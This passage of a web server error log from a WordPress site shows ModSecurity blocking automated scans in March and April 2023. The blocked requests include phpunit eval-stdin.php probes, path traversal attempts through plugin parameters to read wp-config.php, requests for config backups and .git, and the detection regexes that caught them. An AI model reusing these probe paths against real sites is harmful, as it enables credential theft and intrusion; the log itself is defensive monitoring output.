1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/contact/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBQAXNvnD7WSFYwghj-wAAANQ"] [Thu Mar 30 12:05:04.373230 2023] [:error] [pid 9378:tid 140295819675392] [client 5.161.102.105:38406] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/invoice/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBQAXNvnD7WSFYwghj_AAAANU"] [Thu Mar 30 12:05:04.393109 2023] [:error] [pid 8934:tid 140295979136768] [client 5.161.102.105:38408] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/epos/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBQPga235zLtbfUvz-aQAAAAI"] [Thu Mar 30 12:05:04.468065 2023] [:error] [pid 8936:tid 140295844853504] [client 5.161.102.105:38410] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/chat/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBQNT1kWaQLjv80FSPDQAAAJI"] [Thu Mar 30 12:05:04.506456 2023] [:error] [pid 8935:tid 140295853246208] [client 5.161.102.105:38412] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/git/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBQGQ0QQSV-J3o6GozMgAAAFE"] [Thu Mar 30 12:05:04.573511 2023] [:error] [pid 8934:tid 140295794497280] [client 5.161.102.105:38414] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/jobs/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBQPga235zLtbfUvz-agAAABg"] [Thu Mar 30 12:05:04.642625 2023] [:error] [pid 8935:tid 140295953958656] [client 5.161.102.105:38416] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/new/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBQGQ0QQSV-J3o6GozMwAAAEU"] [Thu Mar 30 12:05:04.702223 2023] [:error] [pid 9378:tid 140296064046848] [client 5.161.102.105:38418] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/old/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBQAXNvnD7WSFYwghj_QAAAMA"] [Thu Mar 30 12:05:04.729541 2023] [:error] [pid 9378:tid 140295937173248] [client 5.161.102.105:38420] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/html2pdf-master/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBQAXNvnD7WSFYwghj_gAAAMc"] [Thu Mar 30 12:05:04.752649 2023] [:error] [pid 8935:tid 140295945565952] [client 5.161.102.105:38422] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/phpmailer/PHPMailer/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBQGQ0QQSV-J3o6GozNAAAAEY"] [Thu Mar 30 12:05:04.822602 2023] [:error] [pid 9378:tid 140295844853504] [client 5.161.102.105:38424] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/sitio/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBQAXNvnD7WSFYwghj_wAAANI"] [Thu Mar 30 12:05:04.850919 2023] [:error] [pid 8936:tid 140295828068096] [client 5.161.102.105:38426] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/phpmailer/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBQNT1kWaQLjv80FSPDgAAAJQ"] [Thu Mar 30 12:05:04.874254 2023] [:error] [pid 8934:tid 140295895209728] [client 5.161.102.105:38428] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/admin/ckeditor/plugins/ajaxplorer/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBQPga235zLtbfUvz-awAAAAw"] [Thu Mar 30 12:05:04.919311 2023] [:error] [pid 9378:tid 140295836460800] [client 5.161.102.105:38430] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/update/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBQAXNvnD7WSFYwghkAAAAANM"] [Thu Mar 30 12:05:04.957281 2023] [:error] [pid 8936:tid 140295920387840] [client 5.161.102.105:38432] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/local/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBQNT1kWaQLjv80FSPDwAAAIk"] [Thu Mar 30 12:05:04.988125 2023] [:error] [pid 8934:tid 140295928780544] [client 5.161.102.105:38434] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/home/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBQPga235zLtbfUvz-bAAAAAg"] [Thu Mar 30 12:05:05.014018 2023] [:error] [pid 8935:tid 140295878424320] [client 5.161.102.105:38436] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/backoffice/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBQWQ0QQSV-J3o6GozNQAAAE4"] [Thu Mar 30 12:05:05.054211 2023] [:error] [pid 9378:tid 140295802889984] [client 5.161.102.105:38438] [client 5.161.102.105] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "25"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/project/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZCXBQQXNvnD7WSFYwghkAQAAANc"] [Thu Mar 30 16:50:32.769569 2023] [:error] [pid 9378:tid 140295979136768] [client 178.159.37.25:53416] [client 178.159.37.25] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/admin-word-count-column/download-csv.php"] [unique_id "ZCYEKAXNvnD7WSFYwghtvQAAAMI"] [Thu Mar 30 16:50:32.839658 2023] [:error] [pid 8936:tid 140295870031616] [client 178.159.37.25:53434] [client 178.159.37.25] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/web.config"] [unique_id "ZCYEKNT1kWaQLjv80FSUWgAAAI8"] [Thu Mar 30 16:50:32.859131 2023] [:error] [pid 8936:tid 140295853246208] [client 178.159.37.25:53444] [client 178.159.37.25] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php"] [unique_id "ZCYEKNT1kWaQLjv80FSUXgAAAJE"] [Thu Mar 30 16:50:32.882363 2023] [:error] [pid 9378:tid 140295895209728] [client 178.159.37.25:53470] [client 178.159.37.25] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-admin/admin-post.php?alg_wc_pif_download_file=../../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-admin/admin-post.php"] [unique_id "ZCYEKAXNvnD7WSFYwghtywAAAMw"] [Thu Mar 30 16:50:32.884047 2023] [:error] [pid 9378:tid 140295962351360] [client 178.159.37.25:53472] [client 178.159.37.25] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/jsmol2wp/php/jsmol.php"] [unique_id "ZCYEKAXNvnD7WSFYwghtzAAAAMQ"] [Thu Mar 30 16:50:32.953206 2023] [:error] [pid 9378:tid 140295878424320] [client 178.159.37.25:53488] [client 178.159.37.25] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".inc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.inc"] [unique_id "ZCYEKAXNvnD7WSFYwght1AAAAM4"] [Thu Mar 30 16:50:32.963986 2023] [:error] [pid 9378:tid 140295895209728] [client 178.159.37.25:53490] [client 178.159.37.25] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.bak"] [unique_id "ZCYEKAXNvnD7WSFYwght1QAAAMw"] [Thu Mar 30 16:50:32.975852 2023] [:error] [pid 8934:tid 140295962351360] [client 178.159.37.25:53492] [client 178.159.37.25] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.old"] [unique_id "ZCYEKPga235zLtbfUvwB0wAAAAQ"] 2023/03/31 02:22:59 [error] 8805#8805: *602791 access forbidden by rule, client: 143.110.233.233, server: investigacionperu.com, request: "GET /.git/ HTTP/1.1", host: "investigacionperu.com" 2023/03/31 02:22:59 [error] 8804#8804: *602792 access forbidden by rule, client: 143.110.233.233, server: investigacionperu.com, request: "GET /.git/ HTTP/1.1", host: "investigacionperu.com" [Fri Mar 31 03:45:26.514280 2023] [ssl:warn] [pid 1507:tid 140017008809856] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Mar 31 03:45:26.639562 2023] [ssl:warn] [pid 1508:tid 140017008809856] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Mar 31 03:45:27.252990 2023] [ssl:warn] [pid 1508:tid 140017008809856] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Mar 31 03:45:29.417525 2023] [ssl:warn] [pid 1508:tid 140017008809856] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Mar 31 03:45:31.645898 2023] [ssl:warn] [pid 1943:tid 140376742025088] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Mar 31 03:45:31.758860 2023] [ssl:warn] [pid 1944:tid 140376742025088] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Mar 31 03:45:32.381853 2023] [ssl:warn] [pid 1944:tid 140376742025088] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Mar 31 14:32:03.193228 2023] [autoindex:error] [pid 2708:tid 140376544618240] [client 20.14.138.191:54642] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sat Apr 01 03:33:24.086116 2023] [ssl:warn] [pid 27616:tid 139897810057088] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Apr 01 03:33:24.233172 2023] [ssl:warn] [pid 27617:tid 139897810057088] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Apr 01 03:33:24.681110 2023] [ssl:warn] [pid 27617:tid 139897810057088] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Apr 01 03:33:26.430544 2023] [ssl:warn] [pid 27617:tid 139897810057088] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Apr 01 03:33:30.180521 2023] [ssl:warn] [pid 28189:tid 139833400162176] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Apr 01 03:33:30.292244 2023] [ssl:warn] [pid 28190:tid 139833400162176] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Apr 01 19:13:40.901713 2023] [autoindex:error] [pid 28508:tid 139832944662272] [client 20.110.118.172:45896] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sun Apr 02 03:12:19.257995 2023] [ssl:warn] [pid 25327:tid 140713143654272] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Apr 02 03:12:19.420614 2023] [ssl:warn] [pid 25328:tid 140713143654272] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Apr 02 03:12:19.909217 2023] [ssl:warn] [pid 25328:tid 140713143654272] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Apr 02 03:12:22.007025 2023] [ssl:warn] [pid 25328:tid 140713143654272] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Apr 02 03:12:25.682213 2023] [ssl:warn] [pid 25806:tid 140553856849792] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Apr 02 03:12:25.794204 2023] [ssl:warn] [pid 25807:tid 140553856849792] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Apr 02 04:44:42.592781 2023] [autoindex:error] [pid 26337:tid 140553425458944] [client 20.122.10.105:43504] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex 